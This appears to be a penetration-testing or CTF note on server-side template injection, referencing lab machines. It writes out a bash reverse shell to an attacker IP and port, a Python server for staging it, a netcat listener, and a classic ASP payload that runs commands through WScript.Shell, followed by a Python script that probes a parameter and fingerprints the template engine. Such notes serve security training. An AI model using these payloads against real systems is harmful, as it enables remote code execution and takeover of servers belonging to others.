Server-side template injection vulnerabilities can expose websites to a variety of attacks depending on the template engine in question and how exactly the application uses it. In certain rare circumstances, these vulnerabilities pose no real security risk. However, most of the time, the impact of server-side template injection can be catastrophic.
PYTHON
There are several sources of SSTI payloads to test with, such as payloadbox and HackTricks; the HackTricks page also has a detailed explanation of the vulnerability and a methodology we can follow to test inputs for SSTI.
First, inject the payload into the request. In this example the `costume` parameter is the injection point (left empty here, the template payload goes there), while `q` and `addr` only carry filler values:

```http
POST / HTTP/1.1
.
.
costume=&q=ad&addr=ad
```
Create a bash reverse-shell script and save it as index.html. The IP and port are our attacker machine and the port our listener will use:

```bash
#!/bin/bash
# Interactive bash with stdin/stdout/stderr tied to a TCP connection back to the listener
bash -c 'bash -i >& /dev/tcp/10.10.16.5/1235 0>&1'
```
From the directory containing index.html, start a Python HTTP server so the target can fetch the script (sudo is only needed to bind to port 80), and in a second terminal start the netcat listener on the port used in the script:

```bash
sudo python3 -m http.server 80
nc -lvnp 1235
```
Examples: Epsilon
ASP
Classic ASP (VBScript) SSTI can be detected with the following payload, which asks the engine to evaluate an arithmetic expression:

```asp
<%response.write (7*7)%>
```

If the response contains "49" (and not the literal `7*7`), the expression was evaluated server-side and the following payload gives RCE. `WScript.Shell.Exec` runs the command and its stdout is written into the response; the ping also gives an out-of-band confirmation, since an ICMP echo request arriving at 10.10.14.4 (watch for it with tcpdump on your VPN interface) proves the command ran even if the output is not reflected:

```asp
<%response.write CreateObject("WScript.Shell").Exec("cmd /c ping -n 1 10.10.14.4").StdOut.Readall()%>
```
Examples: [[Anubis#^95c992]]
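The `7*7` probe used in both the Python and ASP sections is the first step of the usual SSTI methodology: send a harmless expression in each template syntax, see which one gets evaluated, then disambiguate engines that share a syntax (Jinja2 and Twig both use `{{ }}`, but `{{7*'7'}}` gives `7777777` in Python and `49` in PHP). The script below is an added example and is not code from the original note or from any of the referenced writeups; the target URL, the `costume`/`q`/`addr` parameters and the sample responses are placeholders modelled on the request above. It compares each probe response against a baseline response so that a page that already contains "49" somewhere does not produce a false positive.

```python
"""Probe one request parameter for SSTI and fingerprint the template engine.

Added example, not from the original note. Probe strings and the decision
tree follow the common SSTI testing methodology; URL, parameter names and
the sample responses are placeholders.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request

# Probe string -> token that only appears in the response if the template
# engine evaluated the expression (None = disambiguator, see classify()).
PROBES = {
    "{{7*7}}": "49",                   # Jinja2, Twig, Nunjucks, ...
    "{{7*'7'}}": None,                 # splits Jinja2 (7777777) from Twig (49)
    "${7*7}": "49",                    # Freemarker, Mako, Velocity, Java EL
    "<%= 7*7 %>": "49",                # ERB (Ruby)
    "<%response.write(7*7)%>": "49",   # classic ASP (VBScript), as in the ASP section
}


def evaluated(baseline, body, token):
    """True if `token` occurs more often in the probe response than in the
    baseline, i.e. the engine produced it rather than the page already
    containing it or simply echoing our raw input."""
    return body.count(token) > baseline.count(token)


def classify(baseline, results):
    """Map probe responses to an engine family.

    baseline: body returned for a harmless value in the same parameter.
    results:  {probe string: response body} for whichever probes were sent.
    Returns "jinja2", "twig", "braces", "dollar", "erb", "asp" or None.
    """
    if evaluated(baseline, results.get("{{7*7}}", ""), "49"):
        split = results.get("{{7*'7'}}")
        if split is not None:
            if evaluated(baseline, split, "7777777"):   # Python repeats the string
                return "jinja2"
            if evaluated(baseline, split, "49"):        # PHP coerces '7' to 7
                return "twig"
        return "braces"          # {{ }} evaluated, engine not yet narrowed down
    if evaluated(baseline, results.get("${7*7}", ""), "49"):
        return "dollar"
    if evaluated(baseline, results.get("<%= 7*7 %>", ""), "49"):
        return "erb"
    if evaluated(baseline, results.get("<%response.write(7*7)%>", ""), "49"):
        return "asp"
    return None


def send(url, param, value, fixed=None, method="POST", timeout=10):
    """Send one request with param=value plus any fixed parameters; return the
    body as text. Error pages are returned too, since reflections often live
    in 500 responses."""
    data = dict(fixed or {})
    data[param] = value
    encoded = urllib.parse.urlencode(data)
    if method == "GET":
        req = urllib.request.Request(f"{url}?{encoded}")
    else:
        req = urllib.request.Request(url, data=encoded.encode(), method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.read().decode(errors="replace")


def probe(url, param, fixed=None, method="POST"):
    """Fire every probe at `param` and classify the responses."""
    baseline = send(url, param, "AAAA", fixed, method)
    results = {p: send(url, param, p, fixed, method) for p in PROBES}
    return classify(baseline, results), results


if __name__ == "__main__":
    # Placeholder target modelled on the request in the PYTHON section:
    # probe `costume`, keep `q` and `addr` constant.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://target.example/"
    verdict, _ = probe(target, "costume", {"q": "ad", "addr": "ad"})
    print("engine:", verdict or "no evaluation detected")
```

Once `classify` returns an engine family, switch to that engine's payload list from the sources above; a "braces" verdict means the `{{7*'7'}}` probe was not sent or was filtered, and should be retried before picking payloads.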